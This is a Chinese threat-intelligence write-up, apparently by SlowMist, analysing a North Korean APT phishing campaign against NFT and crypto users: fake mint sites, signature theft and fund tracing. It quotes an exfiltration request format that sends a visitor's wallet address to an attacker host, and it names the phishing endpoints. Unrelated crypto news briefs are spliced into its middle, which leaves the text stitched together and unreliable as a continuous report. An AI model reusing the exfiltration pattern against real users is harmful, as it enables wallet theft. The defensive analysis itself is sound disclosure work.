背景
9月2日,慢雾安全团队发现疑似APT团伙针对加密生态的NFT用户进行大规模钓鱼活动,并发布了《“零元购”NFT钓鱼分析》。9月4日,推特用户PhantomX发推称朝鲜APT组织针对数十个ETH和SOL项目进行大规模的网络钓鱼活动。
该推特用户给出了196个钓鱼域名信息,分析后关联到朝鲜黑客相关信息,具体的域名列表如下:
慢雾安全团队注意到该事件并第一时间跟进深入分析:
由于朝鲜黑客针对加密货币行业的攻击模型多样化,我们披露的也只是冰山一角,因为一些保密的要求,本篇文章也仅针对其中一部分钓鱼素材包括相关钓鱼钱包地址进行分析。这里将重点针对NFT钓鱼进行分析。钓鱼网站分析
经过深入分析,发现此次钓鱼的其中一种方式是发布虚假NFT相关的、带有恶意Mint的诱饵网站,这些NFT在OpenSea、X2Y2和Rarible等平台上都有出售。此次APT组织针对Crypto和NFT用户的钓鱼涉及将近500多个域名。查询这些域名的注册相关信息,发现注册日期最早可追溯到7个月前:
加密服务公司BCB集团取消收购Sutor银行:金色财经报道,数字资产交易公司BCB集团将不再收购金融机构Sutor银行。根据一份电子邮件声明,经过双方的“仔细分析和考虑”,Sutor银行撤回了向BCB集团出售股份的协议。BCB引用了“最近的银行市场事件和宏观经济变化”,并表示将通过在法国申请电子货币许可证,更多地关注其欧洲战略,并采取行动捕捉和服务美元支付轨道的需求。
BCB集团于2021年12月首次宣布了收购Sutor银行的计划。交易的具体条款尚未公布,但此前报道,这笔交易将提供“大笔注资”。[2023/6/15 21:37:19]
同时我们也发现朝鲜黑客常使用的一些独有的钓鱼特征:特征一:钓鱼网站都会记录访客数据并保存到外部站点。黑客通过HTTPGET请求将站点访问者信息记录到外部域,发送请求的域名虽不同但是请求的API接口都为“/postAddr.php”。一般格式为“https://nserva.live/postAddr.php?mmAddr=......&accessTime=xxx&url=evil.site”,其中参数mmAddr记录访客的钱包地址,accessTime记录访客的访问时间,url记录访客当前所访问的钓鱼网站链接。
OKX Ventures战略投资NFT市场Alien Swap:5月4日消息,OKX Ventures宣布战略投资NFT市场Alien Swap,新的融资将用于扩大其工程团队,开发创新的NFT流动性工具和交易产品。Alien Swap是社区化NFT市场和聚合器,累计交易量已突破5000万美金。OKX Ventures创始人Dora表示,“2021年的NFT交易总额达到了约200亿美元,OKXVentures看好NFT赛道的长期发展,已布局了多个NFT项目,期待本次投资能帮助Alien Swap成为更高效的NFT市场,重塑行业竞争格局。”[2023/5/4 14:42:56]
特征二:钓鱼网站会请求一个NFT项目价目表,通常HTTP的请求路径为“getPriceData.php”:
特征三:存在一个链接图像到目标项目的文件“imgSrc.js”,包含目标站点列表和在其相应网络钓鱼站点上使用的图像文件的托管位置,这个文件可能是钓鱼网站模板的一部分。
Meta不再向广告商推销元宇宙:金色财经报道,Meta 不再在与广告商的会议上向广告商推销元宇宙。相反,该公司正在鼓励使用其短视频产品 Reels,同时还强调其大量的 AI 工具。[2023/4/18 14:10:59]
进一步分析发现APT用于监控用户请求的主要域名为“thedoodles.site”,此域名在APT活动早期主要用来记录用户数据:
查询该域名的HTTPS证书启用时间是在7个月之前,黑客组织已经开始实施对NFT用户对攻击。
最后来看下黑客到底运行和部署了多少个钓鱼站点:比如最新的站点伪装成世界杯主题:
当前以太坊市值占比为19.57%,处于去年9月15日以来高位:金色财经报道,据CoinGecko数据显示,当前加密货币市值为1.32万亿美元,24小时交易量为543.78亿美元,当前比特币市值占比为44.3%,以太坊市值占比为19.57%,处于去年9月15日以来高位。[2023/4/16 14:06:04]
继续根据相关的HTTPS证书搜索得到相关的网站主机信息:
在一些主机地址中发现了黑客使用的各种攻击脚本和统计受害者信息的txt文件。
这些文件记录了受害者访问记录、授权情况、使用插件钱包的情况:
可以发现这些信息跟钓鱼站点采集的访客数据相吻合。其中还包括受害者approve记录:
麦当劳开始在瑞士卢加诺市接受比特币支付:金色财经报道,麦当劳在瑞士的卢加诺市开始接受比特币作为支付方式。Bitcoin Magazine在推特上分享了一段在当地麦当劳点餐的视频,视频显示在收银台付款机器上有比特币和Tether符号标志。
2022年3月,该市与Tether Operations Limited签署了一份谅解备忘录,启动了一个“B计划”项目。根据这个计划,Tether创建了两个基金。第一个是1.06亿美元,用于加密货币初创企业的投资池,第二个是大约300万美元,试图鼓励全市的商店和企业采用加密货币。(Cointelegraph)[2022/10/4 18:39:14]
以及签名数据sigData等,由于比较敏感此处不进行展示。另外,统计发现主机相同IP下NFT钓鱼站群,单独一个IP下就有372个NFT钓鱼站点:
另一个IP下也有320个NFT钓鱼站群:
甚至包括朝鲜黑客在经营的一个DeFi平台:
由于篇幅有限,此处不再赘述。钓鱼手法分析
结合之前《NFT零元购钓鱼》文章,我们对此次钓鱼事件的核心代码进行了分析。我们发现黑客钓鱼涉及到WETH、USDC、DAI、UNI等多个地址协议。
下面代码用于诱导受害者进行授权NFT、ERC20等较常见的钓鱼Approve操作:
除此之外,黑客还会诱导受害者进行Seaport、Permit等签名。
下面是这种签名的正常样例,只是在钓鱼网站中不是“opensea.io”这个域名。
我们在黑客留下的主机也发现了这些留存的签名数据和“Seaport”的签名数据特征一致。
由于这类型的签名请求数据可以“离线存储”,黑客在拿到大量的受害者签名数据后批量化的上链转移资产。MistTrack分析
对钓鱼网站及手法分析后,我们选取其中一个钓鱼地址进行分析。可以看到这个地址已被MistTrack标记为高风险钓鱼地址,交易数也还挺多。钓鱼者共收到1055个NFT,售出后获利近300ETH。
往上溯源,该地址的初始资金来源于地址转入的4.97ETH。往下溯源,则发现该地址有与其他被MistTrack标记为风险的地址有交互,以及有5.7ETH转入了FixedFloat。
再来分析下初始资金来源地址,目前收到约6.5ETH。初始资金来源于Binance转入的1.433ETH。
同时,该地址也是与多个风险地址进行交互。
总结
由于保密性和隐私性,本文仅针对其中一部分NFT钓鱼素材进行分析,并提炼出朝鲜黑客的部分钓鱼特征,当然,这只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。Ps.感谢hip、ScamSniffer提供的支持。相关链接:https://www.prevailion.com/what-wicked-webs-we-unweavehttps://twitter.com/PhantomXSec/status/1566219671057371136https://twitter.com/evilcos/status/1603969894965317632原地址
郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。